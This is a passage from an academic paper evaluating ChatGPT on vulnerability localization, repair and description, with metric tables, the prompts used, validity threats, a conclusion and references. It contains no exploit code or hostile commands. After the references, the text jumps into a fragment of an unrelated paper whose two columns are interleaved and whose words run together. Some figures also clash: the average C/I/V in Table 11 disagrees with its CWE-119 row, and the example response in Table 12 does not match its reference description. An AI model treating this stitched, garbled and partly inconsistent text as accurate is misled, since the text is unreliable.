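    [1, 3, 5, 11, 15, 16, 17, 21, 22, 23],
    [2, 3, 5, 9, 14, 23],
) == (1, 0.3, 0.5)
```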
[Fig. 3. Boxplots of the vulnerability localization results: (a) Precision and (b) Recall, per CWE type (CWE-119, CWE-125, CWE-189, CWE-20, CWE-200, CWE-264, CWE-362, CWE-399, CWE-416, CWE-476).]

Results. Table 8 shows the average vulnerability localization performance of ChatGPT across different CWE types, and Fig. 3 illustrates the boxplots of ChatGPT's performance on each type.

Table 8. The performance of ChatGPT on vulnerability localization

CWE Type | #Size | Hit@Acc | Precision | Recall
CWE-119 | 11 | 0.36 | 0.09 | 0.22
CWE-125 | 14 | 0.29 | 0.15 | 0.13
CWE-189 | 9 | 0 | 0 | 0
CWE-20 | 12 | 0.42 | 0.25 | 0.09
CWE-200 | 10 | 0.40 | 0.20 | 0.28
CWE-264 | 9 | 0.22 | 0.22 | 0.06
CWE-362 | 10 | 0.30 | 0.15 | 0.09
CWE-399 | 9 | 0.11 | 0.01 | 0.11
CWE-416 | 11 | 0.27 | 0.23 | 0.09
CWE-476 | 10 | 0.20 | 0.12 | 0.12
Average | 105 | 0.27 | 0.15 | 0.12

Note: values ≤ 0.10 and ≥ 0.20 are highlighted with different colors in the original table for better illustration.

Based on this table as well as the detailed figure, we can make the following observations: 1) Overall, ChatGPT has a certain ability to locate the potentially risky lines in a given vulnerable function; it achieves a good Hit@Acc performance of 0.27. 2) ChatGPT performs well in identifying the vulnerability position for some CWE types (i.e., CWE-20, CWE-200, CWE-264, and CWE-416) with acceptable precision (i.e., ≥ 0.20). However, it performs badly on CWE-189, which means "Numeric Errors" cannot easily be understood by ChatGPT. 3) Considering both Precision and Recall shown in Fig. 3, we find that ChatGPT has a poor median performance (i.e., 0; the orange lines in the boxplots) for each CWE type, and it performs relatively stably on five CWE types (i.e., CWE-119, CWE-125, CWE-20, CWE-200, and CWE-362).

Finding-7. ChatGPT exhibits a certain capability in vulnerability localization, and its performance varies among different CWE types. It performs well in locating CWE-119, CWE-125, CWE-20, CWE-200, and CWE-362, but performs badly on CWE-189.

4.4 RQ-4: Evaluating Vulnerability Repair of ChatGPT

Setting. We instruct ChatGPT with the following prompts (i.e., Prompt 4.1 and Prompt 4.2), telling it to repair vulnerable code: 1) providing ChatGPT with only the vulnerable code to explore its performance (Prompt 4.1); 2) providing ChatGPT with the vulnerability-relevant lines of the vulnerable code to investigate the performance differences (Prompt 4.2). Table 9 shows an example of how we investigate ChatGPT's ability of vulnerability repair.

Prompt 4.1: I will provide you with a vulnerable C code snippet and you must repair it. This C code snippet definitely has a vulnerability, so you don't need to determine whether there is a vulnerability, just output the repaired whole C code snippet without explanation.

Prompt 4.2: I will provide you with a vulnerable C code snippet and vulnerable lines, you must repair it. This C code snippet definitely has a vulnerability, so you don't need to determine whether there is a vulnerability. You need to use the index to label each line of code, and I will provide you with lines of code that are vulnerable such as Lines: [1,4,5], just output the repaired whole C code snippet without explanation.
Results. Due to the hidden nature of vulnerabilities and the lack of context, it is difficult to determine whether ChatGPT has successfully fixed a vulnerability through manual observation. Therefore, when evaluating, we choose the code with only one vulnerable line and determine whether ChatGPT has fixed the vulnerable line and its contextual statements. If so, the performance metric Hit is calculated as 1, indicating that ChatGPT has the ability to fix the vulnerability; otherwise, Hit is assigned 0. Table 10 displays the detailed results of how ChatGPT performs on the Top-10 CWE types. The Hit metric indicates whether ChatGPT successfully fixes the vulnerable line, while Hit_ctx means ChatGPT's performance when provided with additional context information (i.e., the vulnerability-relevant lines). Finally, the column "#Manual" gives the number of patches correctly generated by ChatGPT when we manually compare them with the ground truth.

Based on the table, we can make the following observations:
• Overall, ChatGPT shows limited success in repairing vulnerable code snippets, with an average Hit rate of 0.20 and Hit_ctx of 0.24. This suggests that there is room for improvement in its ability to detect and fix vulnerabilities.
• The performance of ChatGPT varies across different CWE types. For some types, like CWE-264, it has a perfect score (1) in both Hit and Hit_ctx, while for others, like CWE-476 and CWE-119, it fails to fix the vulnerability altogether.
• Providing vulnerable lines (Prompt 4.2) does not consistently improve ChatGPT's performance. For some CWE types, Hit_ctx is higher than the Hit rate (e.g., CWE-189), while for others, it remains the same or decreases (e.g., CWE-20). This indicates that the extra information may not always be helpful for ChatGPT in repairing the vulnerability.
• Overall, ChatGPT has only a trivial ability to repair a vulnerability.
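For orientation, the single-line Hit check could be approximated automatically as below. Note that the paper applies this judgment manually (also inspecting the contextual statements), so this whitespace-normalized comparison is only an illustrative proxy.

```python
# Rough sketch of the single-line Hit check; an approximation of the
# paper's manual judgment, not its procedure.
def hit(repaired_code: str, vulnerable_line: str) -> int:
    normalize = lambda s: " ".join(s.split())
    repaired_lines = {normalize(l) for l in repaired_code.splitlines()}
    # Hit = 1 when the original vulnerable line no longer appears verbatim,
    # i.e., the model changed the flagged statement.
    return 0 if normalize(vulnerable_line) in repaired_lines else 1
```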
Finding-8. ChatGPT has limited ability in repairing vulnerabilities, no matter whether provided with context information or not.

We also delve into the specific information of CWE types to analyze ChatGPT's performance:
• CWE-264 (Privilege Escalation). ChatGPT performs well in fixing vulnerabilities related to privilege escalation, with a perfect score of 1 in both Hit and Hit_ctx. This could be because privilege escalation vulnerabilities often involve specific patterns, such as incorrect permission checks or improper use of privileges, which ChatGPT might have learned effectively during training.
• CWE-476 (NULL Pointer Dereference) and CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). ChatGPT struggles to fix these vulnerabilities and even fails to find the vulnerable position, resulting in Hit and Hit_ctx scores of 0. These types of vulnerabilities might be more challenging for ChatGPT due to their complex nature and dependence on the specific context of the code. For instance, detecting and fixing a NULL pointer dereference often requires understanding the control flow and data flow of the code, while buffer-related vulnerabilities require a deep understanding of memory management.
• CWE-189 (Numeric Errors) and CWE-125 (Out-of-bounds Read). ChatGPT's performance varies for these types, with Hit scores of 0.17 and 0.20, and Hit_ctx scores of 0.50 and 0.20, respectively. This suggests that ChatGPT might have some understanding of the patterns involved in these vulnerabilities, but its success in fixing them is inconsistent. Numeric errors often involve incorrect calculations or data conversions, while out-of-bounds read issues typically stem from improper boundary checks. Improving ChatGPT's understanding of these patterns and their underlying causes could potentially enhance its performance in repairing these vulnerabilities.

Finding-9. ChatGPT's performance in repairing different CWE types can be attributed to its ability to recognize and understand specific vulnerability patterns. For certain types with well-defined patterns, it performs well, while for others with more complex or context-dependent patterns, it struggles to identify and fix the vulnerabilities.

Table 9. Examples of vulnerability repair

Setting: Vulnerable code
Prompt: (Prompt 4.1, as above)
Input: An example of a C code snippet with vulnerabilities (CVE-2019-17773).

Setting: Vulnerable code & vulnerability-relevant lines
Prompt: (Prompt 4.2, as above)
Input: An example of a C code snippet with vulnerabilities (CVE-2019-17773). Vulnerability-relevant lines: [4,5,8,9,10,11,12,13,14,15,16,18,20,21,23,24].

Table 10. The software vulnerability repair performance of ChatGPT on Top-10 CWE types

CWE Type | #Size | Hit | Hit_ctx | #Manual
CWE-20 | 7 | 0.29 | 0.14 | 1/1
CWE-416 | 6 | 0.17 | 0.17 | 0/1
CWE-189 | 6 | 0.17 | 0.50 | 0/0
CWE-119 | 5 | 0 | 0.20 | 0/0
CWE-125 | 5 | 0.20 | 0.20 | 0/0
CWE-476 | 5 | 0 | 0 | 0/0
CWE-362 | 4 | 0 | 0.25 | 0/0
CWE-399 | 3 | 0.33 | 0 | 0/0
CWE-200 | 3 | 0.33 | 0.33 | 0/0
CWE-264 | 2 | 1 | 1 | 0/0
Average | 46 | 0.20 | 0.24 | 1/2

4.5 RQ-5: Evaluating Vulnerability Description of ChatGPT

Setting.
We instruct ChatGPT with a designated prompt, guiding it to perform the role of a vulnerability descriptor. Table 12 illustrates an example of our approach to evaluating ChatGPT's proficiency in generating vulnerability descriptions.

Prompt 5.1: I will provide you with a vulnerable C code snippet and you must generate a CVE description. This C code snippet definitely has a vulnerability, so you don't need to determine whether there is a vulnerability, just output the CVE description.

To evaluate the precision of the generated CVE descriptions, we adopt the widely used performance metric ROUGE [36], a set of metrics used for evaluating automatic summarization and machine translation software in natural language processing. The metrics compare an automatically produced summary or translation against a reference (human-produced) summary or translation, or a set of references. Here, we consider three settings: ROUGE-1, ROUGE-2, and ROUGE-L.
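The three ROUGE variants can be computed, for instance, with Google's `rouge-score` package; the snippet below is a sketch of such an evaluation, not necessarily the exact tooling used in the paper.

```python
# Sketch of scoring a generated description against the reference CVE text
# with the `rouge-score` package (pip install rouge-score); mirrors the
# ROUGE-1/2/L settings, though the paper's exact tooling is unspecified.
from rouge_score import rouge_scorer

scorer = rouge_scorer.RougeScorer(["rouge1", "rouge2", "rougeL"],
                                  use_stemmer=True)

def rouge_f1(generated: str, reference: str) -> dict:
    scores = scorer.score(reference, generated)
    return {name: s.fmeasure for name, s in scores.items()}
```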
Table 11. The software vulnerability description performance of ChatGPT on Top-10 CWE types

CWE Type | #Size | ROUGE-1 | ROUGE-2 | ROUGE-L | C/I/V
CWE-125 | 22 | 0.21 | 0.05 | 0.20 | 0/0/0
CWE-362 | 21 | 0.24 | 0.08 | 0.22 | 0/0/0
CWE-189 | 20 | 0.21 | 0.05 | 0.18 | 0/0/0
CWE-119 | 19 | 0.29 | 0.12 | 0.27 | 2/6/0
CWE-200 | 18 | 0.26 | 0.11 | 0.25 | 0/0/0
CWE-476 | 17 | 0.25 | 0.10 | 0.24 | 0/0/0
CWE-416 | 16 | 0.23 | 0.07 | 0.21 | 0/0/0
CWE-20 | 15 | 0.25 | 0.08 | 0.22 | 0/0/0
CWE-399 | 15 | 0.26 | 0.11 | 0.26 | 0/0/0
CWE-264 | 13 | 0.24 | 0.08 | 0.23 | 0/0/0
Average | 176 | 0.24 | 0.08 | 0.23 | 0/0/0

Results. Table 11 presents the vulnerability description capabilities of ChatGPT on the Top-10 CWE types. Based on these results, we can make the following observations: 1) The average ROUGE scores are 0.24 for ROUGE-1, 0.08 for ROUGE-2, and 0.23 for ROUGE-L, which indicates that ChatGPT's performance in generating vulnerability descriptions is moderate, with room for improvement in accurately describing and capturing the nuances of various CWE types. 2) ChatGPT's performance in generating CVE descriptions varies across different CWE types, with ROUGE scores ranging from 0.21 to 0.29 for ROUGE-1, 0.05 to 0.12 for ROUGE-2, and 0.18 to 0.27 for ROUGE-L. 3) The low ROUGE-2 scores indicate that ChatGPT's ability to generate accurate and relevant higher-order n-grams (pairs of consecutive words) in vulnerability descriptions is limited, suggesting potential issues with capturing specific and detailed information.

Finding-10. ChatGPT demonstrates moderate performance in generating CVE descriptions for various CWE types, with varied success across categories and limited accuracy in capturing specific details.

Although ChatGPT has higher performance for some CWE types, its limited ability to generate accurate higher-order n-grams suggests a need for further model refinement. A deeper analysis of the performance across specific CWE types can help guide future improvements to enhance the model's understanding and description of various vulnerabilities. To understand why ChatGPT performs well for some CWE types and not for others, we can examine the nature and complexity of these vulnerabilities:
• Higher performance on CWE-119 and CWE-200. ChatGPT achieves relatively better results in generating descriptions for CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer) and CWE-200 (Information Exposure). These vulnerabilities involve concepts that might be more frequent in the training data, such as memory management and information disclosure, leading to a better understanding and more accurate descriptions.
• Lower performance on CWE-125 and CWE-189. ChatGPT has lower performance in generating descriptions for CWE-125 (Out-of-bounds Read) and CWE-189 (Numeric Errors). This might be due to the complexity of these vulnerabilities, which involve intricate logic and numeric calculations that could be challenging for ChatGPT to fully understand and describe accurately.
• Potential explanations for variability. The variability in performance across different CWE types could be attributed to multiple factors, such as the quantity and quality of training data for each CWE type, the inherent complexity of the vulnerability, or the precise and detailed terminology needed to accurately describe a particular vulnerability. For example, describing a CWE-125 (Out-of-bounds Read) vulnerability might require specific terms like "array index", "buffer", or "memory access" to accurately convey the issue. Similarly, for CWE-189 (Numeric Errors), it may be necessary to use terms like "integer overflow", "truncation", or "arithmetic operation" to provide an accurate description. If ChatGPT has not encountered enough examples of such specific language during its training, it may struggle to generate accurate and detailed descriptions for these vulnerabilities.

Finding-11. ChatGPT demonstrates moderate overall performance in generating vulnerability descriptions, with varied outcomes across different CWE types. This variability can be attributed to factors such as the quality and quantity of training data, the inherent complexity of the vulnerabilities, and the specificity of the language required to describe them.
[Fig. 4. Distribution of key aspects (Cause, Vector, Impact) in (a) CVE descriptions and (b) ChatGPT's output descriptions.]

5 THREATS TO VALIDITY

Threats to Internal Validity are mainly two-fold. The first is the design of the prompts used to instruct ChatGPT to give responses. We design our prompts according to practical advice [49] which has been verified by many users online and can obtain good responses from ChatGPT. Furthermore, ChatGPT generates responses with some randomness even when given the same prompt. Therefore, we set "temperature" to 0, which reduces the randomness as much as possible, and we tried our best to collect all results within two days to avoid the model being upgraded. The second concerns potential mistakes in the implementation of the studied baselines. To minimize such threats, we directly use the original source code shared by the corresponding authors.

Table 12. A vulnerable code for ChatGPT to generate a vulnerability description

Improper Neutralization of Special Elements used in a Command Vulnerability (CWE-77) in neomutt
Prompt: (Prompt 5.1, as above)
Input: An example of a C code snippet with vulnerabilities. CVE ID: CVE-2018-14349.
Response From ChatGPT: An issue was discovered in Mutt before 1.10.1 and NeoMutt before 2018-07-16. They allow remote IMAP servers to execute arbitrary commands via backquote characters, related to the mailboxes command associated with a manual subscription or unsubscription.
CVE Description: An issue was discovered in Mutt before 1.12.2. imap_subscribe() in imap.c mishandles mailbox names containing IMAP metacharacters, as demonstrated by a name composed of the & character and other metacharacters. This can lead to remote denial-of-service (disk consumption), or to local denial-of-service and information disclosure involving the mutate_buffer function in mutt_mem.c, a related issue to CVE-2018-14349.

Threats to External Validity may correspond to the generalization of the studied dataset. To mitigate this threat, we adopt the largest-scale vulnerability dataset with diverse information about the vulnerabilities, which are collected from practical projects and recorded in the Common Vulnerabilities and Exposures (CVE) database. However, we do not consider vulnerabilities found recently. Besides, we do not adopt another large-scale vulnerability dataset named SARD, since it is built manually and cannot reflect the distinct characteristics of the real world [8, 27].

Threats to Construct Validity mainly correspond to the performance metrics in our evaluations. To minimize such threats, we consider several widely used performance metrics to evaluate the performance of ChatGPT on the different types of tasks (e.g., Accuracy, Precision, Recall, and ROUGE).

6 CONCLUSION

This paper aims to comprehensively investigate the capabilities of ChatGPT for software vulnerability tasks as well as its impacts. To achieve that, we adopt a large-scale vulnerability dataset (named Big-Vul) and then conduct several experiments focusing on five dimensions: (1) Vulnerability Detection, (2) Vulnerability Assessment, (3) Vulnerability Localization, (4) Vulnerability Repair, and (5) Vulnerability Description. Overall, although ChatGPT shows some ability in certain areas, it still needs further improvement to be competent in software vulnerability related tasks. Our research conducts a comprehensive survey of ChatGPT's capabilities and provides a reference for enhancing its understanding of software vulnerabilities in the future.

REFERENCES
[1] 2023. Joern. https://github.com/joernio/joern
[2] 2023. Replication. https://figshare.com/s/04856ae0c9005a888e03
[3] Wasi Uddin Ahmad, Saikat Chakraborty, Baishakhi Ray, and Kai-Wei Chang. 2021. Unified pre-training for program understanding and generation. arXiv preprint arXiv:2103.06333 (2021).
[4] Yejin Bang, Samuel Cahyawijaya, Nayeon Lee, Wenliang Dai, Dan Su, Bryan Wilie, Holy Lovenia, Ziwei Ji, Tiezheng Yu, Willy Chung, et al. 2023. A multitask, multilingual, multimodal evaluation of ChatGPT on reasoning, hallucination, and interactivity. arXiv preprint arXiv:2302.04023 (2023).
[5] Guru Bhandari, Amara Naseer, and Leon Moonen. 2021. CVEfixes: automated collection of vulnerabilities and their fixes from open-source software. In Proceedings of the 17th International Conference on Predictive Models and Data Analytics in Software Engineering. 30–39.
[6] Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. 2020. Language models are few-shot learners. Advances in Neural Information Processing Systems 33 (2020), 1877–1901.
[7] Sicong Cao, Xiaobing Sun, Lili Bo, Rongxin Wu, Bin Li, and Chuanqi Tao. 2022. MVD: Memory-Related Vulnerability Detection Based on Flow-Sensitive Graph Neural Networks. arXiv preprint arXiv:2203.02660 (2022).
[8] Saikat Chakraborty, Rahul Krishna, Yangruibo Ding, and Baishakhi Ray. 2021.
Deep learning based vulnerability detection: Are we there yet. IEEE Transactions on Software Engineering (2021).
[9] chatgptendpoint. 2023. Introducing ChatGPT and Whisper APIs. https://openai.com/blog/introducing-chatgpt-and-whisper-apis.
[10] Zimin Chen, Steve James Kommrusch, Michele Tufano, Louis-Noël Pouchet, Denys Poshyvanyk, and Martin Monperrus. 2019. SequenceR: Sequence-to-sequence learning for end-to-end program repair. IEEE Transactions on Software Engineering (2019).
[11] Xiao Cheng, Guanqin Zhang, Haoyu Wang, and Yulei Sui. 2022. Path-sensitive code embedding via contrastive learning for software vulnerability detection. In Proceedings of the 31st ACM SIGSOFT International Symposium on Software Testing and Analysis. 519–531.
[12] Jonathan H Choi, Kristin E Hickman, Amy Monahan, and Daniel Schwarcz. 2023. ChatGPT goes to law school. Available at SSRN (2023).
[13] Paul F Christiano, Jan Leike, Tom Brown, Miljan Martic, Shane Legg, and Dario Amodei. 2017. Deep reinforcement learning from human preferences. Advances in Neural Information Processing Systems 30 (2017).
[14] Gang Fan, Rongxin Wu, Qingkai Shi, Xiao Xiao, Jinguo Zhou, and Charles Zhang. 2019. SMOKE: scalable path-sensitive memory leak detection for millions of lines of code. In 2019 IEEE/ACM 41st International Conference on Software Engineering (ICSE). IEEE, 72–82.
[15] Jiahao Fan, Yi Li, Shaohua Wang, and Tien N Nguyen. 2020. A C/C++ code vulnerability dataset with code changes and CVE summaries. In Proceedings of the 17th International Conference on Mining Software Repositories. 508–512.
[16] Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, et al. 2020. CodeBERT: A pre-trained model for programming and natural languages. arXiv preprint arXiv:2002.08155 (2020).
[17] Andrew Feutrill, Dinesha Ranathunga, Yuval Yarom, and Matthew Roughan. 2018. The effect of common vulnerability scoring system metrics on vulnerability exploit delay. In 2018 Sixth International Symposium on Computing and Networking (CANDAR). IEEE, 1–10.
[18] Michael Fu and Chakkrit Tantithamthavorn. 2022. LineVul: A Transformer-based Line-Level Vulnerability Prediction. (2022).
[19] Aidan Gilson, Conrad Safranek, Thomas Huang, Vimig Socrates, Ling Chi, Richard Andrew Taylor, and David Chartash. 2022. How Well Does ChatGPT Do When Taking the Medical Licensing Exams? The Implications of Large Language Models for Medical Education and Knowledge Assessment. medRxiv (2022), 2022–12.
[20] Yoav Goldberg. 2023. Friend or foe? Teachers debate ChatGPT. https://www.axios.com/2023/01/13/chatgpt-schools-teachers-ai-debate
[21] Yoav Goldberg. 2023. Some remarks on large language models. https://gist.github.com/yoavg/59d174608e92e845c8994ac2e234c8a9
[22] Daya Guo, Shuai Lu, Nan Duan, Yanlin Wang, Ming Zhou, and Jian Yin. 2022. UniXcoder: Unified Cross-Modal Pre-training for Code Representation. arXiv preprint arXiv:2203.03850 (2022).
[23] Daya Guo, Shuo Ren, Shuai Lu, Zhangyin Feng, Duyu Tang, Shujie Liu, Long Zhou, Nan Duan, Alexey Svyatkovskiy, Shengyu Fu, et al. 2020. GraphCodeBERT: Pre-training code representations with data flow. arXiv preprint arXiv:2009.08366 (2020).
[24] Hao Guo, Sen Chen, Zhenchang Xing, Xiaohong Li, Yude Bai, and Jiamou Sun. 2022. Detecting and augmenting missing key aspects in vulnerability descriptions. ACM Transactions on Software Engineering and Methodology (TOSEM) 31, 3 (2022), 1–27.
[25] Hao Guo, Zhenchang Xing, Sen Chen, Xiaohong Li, Yude Bai, and Hu Zhang. 2021. Key aspects augmentation of vulnerability description based on multiple security databases. In 2021 IEEE 45th Annual Computers, Software, and Applications Conference (COMPSAC). IEEE, 1020–1025.
[26] Hao Guo, Zhenchang Xing, and Xiaohong Li. 2020. Predicting missing information of key aspects in vulnerability reports. arXiv preprint arXiv:2008.02456 (2020).
[27] David Hin, Andrey Kan, Huaming Chen, and M Ali Babar. 2022. LineVD: Statement-level Vulnerability Detection using Graph Neural Networks. arXiv preprint arXiv:2203.05181 (2022).
[28] Saad Khan and Simon Parkinson. 2018. Review into state of the art of vulnerability assessment using artificial intelligence. Guide to Vulnerability Analysis for Computer Networks and Systems (2018), 3–32.
[29] Triet H M Le, Huaming Chen, and M Ali Babar. 2021. A survey on data-driven software vulnerability assessment and prioritization. ACM Computing Surveys (CSUR) (2021).
[30] Triet Huynh Minh Le, David Hin, Roland Croft, and M Ali Babar. 2021. DeepCVA: Automated commit-level vulnerability assessment with deep multi-task learning. In 2021 36th IEEE/ACM International Conference on Automated Software Engineering (ASE). IEEE, 717–729.
[31] Wen Li, Haipeng Cai, Yulei Sui, and David Manz. 2020. PCA: memory leak detection using partial call-path analysis. In Proceedings of the 28th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering. 1621–1625.
[32] Yi Li, Shaohua Wang, and Tien N Nguyen. 2021. Vulnerability detection with fine-grained interpretations. In Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering. 292–303.
[33] Zhen Li, Deqing Zou, Shouhuai Xu, Zhaoxuan Chen, Yawei Zhu, and Hai Jin. 2021. VulDeeLocator: a deep learning-based fine-grained vulnerability detector. IEEE Transactions on Dependable and Secure Computing (2021).
[34] Zhen Li, Deqing Zou, Shouhuai Xu, Hai Jin, Yawei Zhu, and Zhaoxuan Chen. 2021. SySeVR: A framework for using deep learning to detect software vulnerabilities. IEEE Transactions on Dependable and Secure Computing (2021).
[35] Zhen Li, Deqing Zou, Shouhuai Xu, Xinyu Ou, Hai Jin, Sujuan Wang, Zhijun Deng, and Yuyi Zhong. 2018. VulDeePecker: A deep learning-based system for vulnerability detection. In Proceedings of the 25th Annual Network and Distributed System Security Symposium.
[36] Chin-Yew Lin. 2004. ROUGE: A package for automatic evaluation of summaries. In Text Summarization Branches Out. 74–81.
[37] Pengfei Liu, Weizhe Yuan, Jinlan Fu, Zhengbao Jiang, Hiroaki Hayashi, and Graham Neubig. 2023. Pre-train, prompt, and predict: A systematic survey of prompting methods in natural language processing. Comput. Surveys 55, 9 (2023), 1–35.
[38] MITRE Corporation. 2023. Common Vulnerabilities and Exposures (CVE). https://cve.mitre.org/
[39] Chao Ni, Liyu Shen, Wei Wang, Xiang Chen, Xin Yin, and Lexiao Zhang. 2023. FVA: Assessing Function-Level Vulnerability by Integrating Flow-Sensitive Structure and Code Statement Semantic. In 2023 IEEE/ACM 31st International Conference on Program Comprehension (ICPC). IEEE, 339–350.
[40] Chao Ni, Wei Wang, Kaiwen Yang, Xin Xia, Kui Liu, and David Lo. 2022. The Best of Both Worlds: Integrating Semantic Features with Expert Features for Defect Prediction and Localization. In Proceedings of the 2022 30th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering. ACM, 672–683.
[41] Chao Ni, Kaiwen Yang, Xin Xia, David Lo, Xiang Chen, and Xiaohu Yang. 2022. Defect Identification, Categorization, and Repair: Better Together. arXiv preprint arXiv:2204.04856 (2022).
[42] Chao Ni, Xin Yin, Kaiwen Yang, Dehai Zhao, Zhenchang Xing, and Xin Xia. 2023. Distinguishing Look-Alike Innocent and Vulnerable Code by Subtle Semantic Representation Learning and Explanation. In Proceedings of the 31st ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering. 1611–1622.
[43] OpenAI. 2022. ChatGPT: Optimizing Language Models for Dialogue. (2022). https://openai.com/blog/chatgpt/.
[44] Long Ouyang, Jeffrey Wu, Xu Jiang, Diogo Almeida, Carroll Wainwright, Pamela Mishkin, Chong Zhang, Sandhini Agarwal, Katarina Slama, Alex Ray, et al. 2022. Training language models to follow instructions with human feedback. Advances in Neural Information Processing Systems 35 (2022), 27730–27744.
[45] Adam Paszke, Sam Gross, Francisco Massa, Adam Lerer, James Bradbury, Gregory Chanan, Trevor Killeen, Zeming Lin, Natalia Gimelshein, Luca Antiga, Alban Desmaison, Andreas Kopf, Edward Yang, Zachary DeVito, Martin Raison, Alykhan Tejani, Sasank Chilamkurthy, Benoit Steiner, Lu Fang, Junjie Bai, and Soumith Chintala. 2019. PyTorch: An Imperative Style, High-Performance Deep Learning Library. In Advances in Neural Information Processing Systems 32. Curran Associates, Inc., 8024–8035. http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high-performance-deep-learning-library.pdf
[46] Alec Radford, Karthik Narasimhan, Tim Salimans, Ilya Sutskever, et al. 2018. Improving language understanding by generative pre-training. (2018).
[47] John Schulman, Filip Wolski, Prafulla Dhariwal, Alec Radford, and Oleg Klimov. 2017. Proximal policy optimization algorithms. arXiv preprint arXiv:1707.06347 (2017).
[48] Yiqiu Shen, Laura Heacock, Jonathan Elias, Keith D Hentel, Beatriu Reig, George Shih, and Linda Moy. 2023. ChatGPT and other large language models are double-edged swords. Radiology (2023), e230163.
[49] Jessica Shieh. 2023. Best practices for prompt engineering with OpenAI API. OpenAI. https://help.openai.com/en/articles/6654000-best-practices-for-prompt-engineering-with-openai-api (2023).
[50] Georgios Spanos and Lefteris Angelis. 2018. A multi-target approach to estimate software vulnerability characteristics and severity scores. Journal of Systems and Software 146 (2018), 152–166.
[51] Jiamou Sun, Zhenchang Xing, Hao Guo, Deheng Ye, Xiaohong Li, Xiwei Xu, and Liming Zhu. 2022. Generating informative CVE description from ExploitDB posts by extractive summarization. ACM Transactions on Software Engineering and Methodology (TOSEM) (2022).
[52] Symantec. 2023. SecurityFocus. https://www.securityfocus.com/
[53] Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Łukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. Advances in Neural Information Processing Systems 30 (2017).
[54] Yue Wang, Weishi Wang, Shafiq Joty, and Steven C H Hoi. 2021. CodeT5: Identifier-aware unified pre-trained encoder-decoder models for code understanding and generation. arXiv preprint arXiv:2109.00859 (2021).
[55] Yueming Wu, Deqing Zou, Shihan Dou, Wei Yang, Duo Xu, and Hai Jin. 2022. VulCNN: An Image-inspired Scalable Vulnerability Detection System. (2022).
[56] Xin Yin and Chao Ni. 2024. Multitask-based Evaluation of Open-Source LLM on Software Vulnerability. arXiv preprint arXiv:2404.02056 (2024).
[57] Xian Zhan, Lingling Fan, Sen Chen, Feng Wei, Tianming Liu, Xiapu Luo, and Yang Liu. 2021. ATVHunter: Reliable version detection of third-party libraries for vulnerability identification in android applications. In 2021 IEEE/ACM 43rd International Conference on Software Engineering (ICSE). IEEE, 1695–1707.
[58] Quanjun Zhang, Yuan Zhao, Weisong Sun, Chunrong Fang, Ziyuan Wang, and Lingming Zhang. 2022. Program Repair: Automated vs. Manual. arXiv preprint arXiv:2203.05166 (2022).
[59] Yaqin Zhou, Shangqing Liu, Jingkai Siow, Xiaoning Du, and Yang Liu. 2019. Devign: Effective vulnerability identification by learning comprehensive program semantics via graph neural networks. In Proceedings of the 33rd International Conference on Neural Information Processing Systems. 10197–10207.
[60] Qihao Zhu, Zeyu Sun, Yuan-an Xiao, Wenjie Zhang, Kang Yuan, Yingfei Xiong, and Lu Zhang. 2021. A syntax-guided
edit decoder for neural program repair. In Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering. 341–353.
[61] Daniel M Ziegler, Nisan Stiennon, Jeffrey Wu, Tom B Brown, Alec Radford, Dario Amodei, Paul Christiano, and Geoffrey Irving. 2019. Fine-tuning language models from human preferences. arXiv preprint arXiv:1909.08593 (2019).
2404.05964 Deep Learning-Based Out-of-distribution Source Code Data Identification: How Far Have We Gone? Van Nguyen*,1,2 and Xingliang Yuan1 and Tingmin Wu2 and Surya Nepal2 Marthie Grobler2 and Carsten Rudolph1 1 Monash University, Australia 2 CSIRO’s Data61, Australia Abstract—Software vulnerabilities (SVs) have become a com- In practice, while AI-based models demonstrate notable mon, serious, and crucial concern to safety-critical security performances in multiple domain applications such as soft- systems.ThatleadstosignificantprogressintheuseofAI-based ware vulnerability detection (SVD), autonomous driving, and methods for software vulnerability detection (SVD). In practice, biometric authentication, they often obtain poor performances although AI-based methods have been achieving promising per- formancesinSVDandotherdomainapplications(e.g.,computer or fail to detect the ground-truth labels (e.g., the categories vision), they are well-known to fail in detecting the ground- of traffic signs or the vulnerability (e.g., vulnerable or non- truthlabelofinputdata(referredtoasout-of-distribution,OOD, vulnerable) of the source code samples) when encountering data) lying far away from the training data distribution (i.e., in- the input data (commonly referred to as out-of-distribution, distribution,ID).Thisdrawbackleadstoseriousissueswherethe OOD,data)significantlylyingfarawayfromthetrainingdata modelsfailtoindicatewhentheyarelikelymistaken.Toaddress this problem, OOD detectors (i.e., determining whether an input distribution [15], [18]–[20]. This limitation poses a serious is ID or OOD) have been applied before feeding the input data challenge as the models struggle to accurately identify in- to the downstream AI-based modules. stances when they are likely to make mistakes. In particular, While OOD detection has been widely designed for computer deeplearning-basedclassifiershavebeenshowntoincorrectly vision and medical diagnosis applications, automated AI-based classify the ground-truth labels of out-of-distribution data techniques for OOD source code data detection have not yet samples with high confidence [18], [21]. That can limit their been well-studied and explored. To this end, in this paper, we propose an innovative deep learning-based approach addressing adoption as well as cause unexpected crucial accidents in the OOD source code data identification problem. Our method safety-critical systems such as medical and security domains. is derived from an information-theoretic perspective with the This problem is particularly severe within the cyber security use of innovative cluster-contrastive learning to effectively learn realm. Hackers can create new vulnerabilities (with the assis- and leverage source code characteristics, enhancing data rep- tance of domain experts and AI-based tools, e.g., generative resentation learning for solving the problem. The rigorous and comprehensive experiments on real-world source code datasets large language models) and exploit these zero-day (a.k.a. out- showtheeffectivenessandadvancementofourapproachcompared of-distribution) vulnerabilities associated with emerging CWE tostate-of-the-artbaselinesbyawidemargin.Inshort,onaverage, categories1 to compromise software security systems until our method achieves a significantly higher performance from appropriate measures are taken to address the issue. 
